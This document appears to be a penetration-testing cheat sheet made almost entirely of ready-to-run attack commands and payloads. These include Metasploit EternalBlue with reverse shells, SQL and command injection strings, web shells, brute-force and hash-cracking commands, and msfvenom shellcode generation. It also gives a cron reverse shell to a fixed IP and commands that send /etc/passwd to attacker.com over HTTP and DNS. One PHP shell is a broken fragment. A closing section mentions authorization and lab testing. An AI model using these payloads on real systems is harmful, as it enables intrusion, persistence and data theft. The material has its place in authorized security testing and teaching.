Exploitation Techniques

Systematic approaches to leveraging vulnerabilities for system compromise

Metasploit Framework

Basic Metasploit Usage

# Start Metasploit msfconsole
# Update Metasploit msfupdate
# Search for exploits msf > search smb msf > search type:exploit platform:windows
# Use an exploit msf > use exploit/windows/smb/ms17_010_eternalblue
# Show exploit options msf exploit(ms17_010_eternalblue) > show options
# Set target and payload msf exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100 msf exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50 msf exploit(ms17_010_eternalblue) > set LPORT 4444
# Execute exploit msf exploit(ms17_010_eternalblue) > exploit

Common Metasploit Exploits

SMB Exploits

# EternalBlue (MS17-010) use exploit/windows/smb/ms17_010_eternalblue # MS08-067 (Conficker) use exploit/windows/smb/ms08_067_netapi # SMB relay attack use exploit/windows/smb/smb_relay

Web Application Exploits

# Apache Struts use exploit/multi/http/struts2_content_type_ognl # Tomcat manager use exploit/multi/http/tomcat_mgr_upload # PHP CGI use exploit/multi/http/php_cgi_arg_injection

Database Exploits

# MySQL UDF use exploit/windows/mysql/mysql_mof # MSSQL xp_cmdshell use exploit/windows/mssql/mssql_payload

Manual Exploitation Techniques

SQL Injection

Union-based SQLi

' UNION SELECT 1,2,3,4,database(),user(),version()--

Boolean-based Blind SQLi

' AND 1=1-- # True condition ' AND 1=2-- # False condition

Time-based Blind SQLi

' AND SLEEP(5)-- ' AND (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) AND SLEEP(5)--

Error-based SQLi

' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()), 0x7e))--

MSSQL Specific

'; EXEC xp_cmdshell('whoami');-- '; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;--

Command Injection

Basic Command Injection

; ls -la | whoami & net user && dir

Bypassing Filters

;w'h'o'a'm'i ;who$()ami ;/b??/l?

File Upload Vulnerabilities

PHP Web Shell

PHP Reverse Shell

&3 2>&3"); ?>

ASP Web Shell

<%eval request("cmd")%>

JSP Web Shell

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

Password Attacks

Hydra Brute Force

# SSH brute force hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://target.com
# HTTP Basic Auth hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://target.com
# HTTP POST form hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"
# Other protocols hydra -l ftp -P /usr/share/wordlists/rockyou.txt ftp://target.com hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://target.com hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://target.com

Medusa Brute Force

# SSH brute force medusa -h target.com -u root -P /usr/share/wordlists/rockyou.txt -M ssh
# HTTP brute force medusa -h target.com -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
# MySQL brute force medusa -h target.com -u root -P /usr/share/wordlists/rockyou.txt -M mysql

John the Ripper

# Crack password hashes john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Crack with rules john --rules --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Show cracked passwords john --show hashes.txt
# Crack ZIP files zip2john file.zip > zip.hash john zip.hash # Crack SSH private keys ssh2john id_rsa > ssh.hash john ssh.hash

Hashcat

# MD5 hashes hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt # NTLM hashes hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt # WPA/WPA2 hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt # Brute force attack hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a

Buffer Overflow Exploitation

Stack Buffer Overflow

Buffer Overflow Process:
  1. Identify vulnerable application
  2. Crash the application with large input
  3. Control the EIP register
  4. Find bad characters
  5. Find JMP ESP address
  6. Generate shellcode
  7. Exploit the vulnerability

Finding Buffer Overflow

# Generate cyclic pattern msf-pattern_create -l 1000 # Find offset msf-pattern_offset -q 0x41414141 -l 1000 # Bad character detection python -c "print('A' * 146 + 'B' * 4 + ''.join(['\\x%02x' % x for x in range(1, 256)]))"

Shellcode Generation

# Generate shellcode with msfvenom msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Network Service Exploitation

SMB Exploitation

# EternalBlue exploitation python eternal_blue_exploit.py 192.168.1.100 # SMB relay attack python smbrelayx.py -tf targets.txt

FTP Exploitation

# FTP bounce attack nmap -b ftp-user:password@ftp-server target.com -p 1-1000 # vsftpd backdoor (if vulnerable version) python vsftpd_exploit.py target.com

SSH Exploitation

# SSH user enumeration exploit python ssh_user_enum.py target.com userlist.txt # SSH key authentication bypass python ssh_auth_bypass.py target.com

Database Exploitation

MySQL Exploitation

# UDF privilege escalation SELECT sys_exec('whoami'); # Load file function SELECT LOAD_FILE('/etc/passwd'); # Write file function SELECT 'shell content' INTO OUTFILE '/var/www/shell.php';

MSSQL Exploitation

# Enable xp_cmdshell EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; # Execute commands EXEC xp_cmdshell 'whoami';

PostgreSQL Exploitation

# Copy command execution COPY (SELECT '') TO PROGRAM 'id'; # Large object functions SELECT lo_import('/etc/passwd', 1234); SELECT lo_export(1234, '/tmp/passwd');

Privilege Escalation Techniques

Linux Privilege Escalation

# SUID binary exploitation find / -perm -4000 -type f 2>/dev/null # Kernel exploits uname -a searchsploit linux kernel 4.4.0 # Cron job exploitation cat /etc/crontab ls -la /etc/cron*

Windows Privilege Escalation

# Unquoted service paths wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v "\"" # AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # Token impersonation whoami /priv # If SeImpersonatePrivilege enabled, use JuicyPotato

Post-Exploitation Techniques

Maintaining Persistence

# Linux persistence echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'" | crontab - # Windows persistence reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Backdoor" /t REG_SZ /d "C:\temp\payload.exe"

Data Exfiltration

# Simple HTTP exfiltration curl -X POST -d @/etc/passwd http://attacker.com/collect # DNS exfiltration for line in $(cat /etc/passwd | base64 -w 0); do dig $line.attacker.com; done # ICMP exfiltration python icmp_exfil.py target_file attacker_ip

Exploitation Best Practices

Testing Methodology

Systematic Approach:
  1. Verify vulnerability exists
  2. Understand the attack vector
  3. Develop proof-of-concept
  4. Test in isolated environment
  5. Execute controlled exploitation
  6. Document impact and evidence

Risk Mitigation

Minimize System Impact:
  • Test exploits in lab environment first
  • Use least invasive exploitation methods
  • Avoid causing system crashes or data loss
  • Monitor system resources during exploitation
  • Have rollback procedures ready
  • Coordinate with system administrators

Legal and Ethical Considerations

Important Reminders:
  • Ensure proper authorization before exploitation
  • Stay within defined scope and rules of engagement
  • Document all exploitation activities
  • Report critical findings immediately
  • Protect sensitive data discovered
  • Remove any backdoors or persistence mechanisms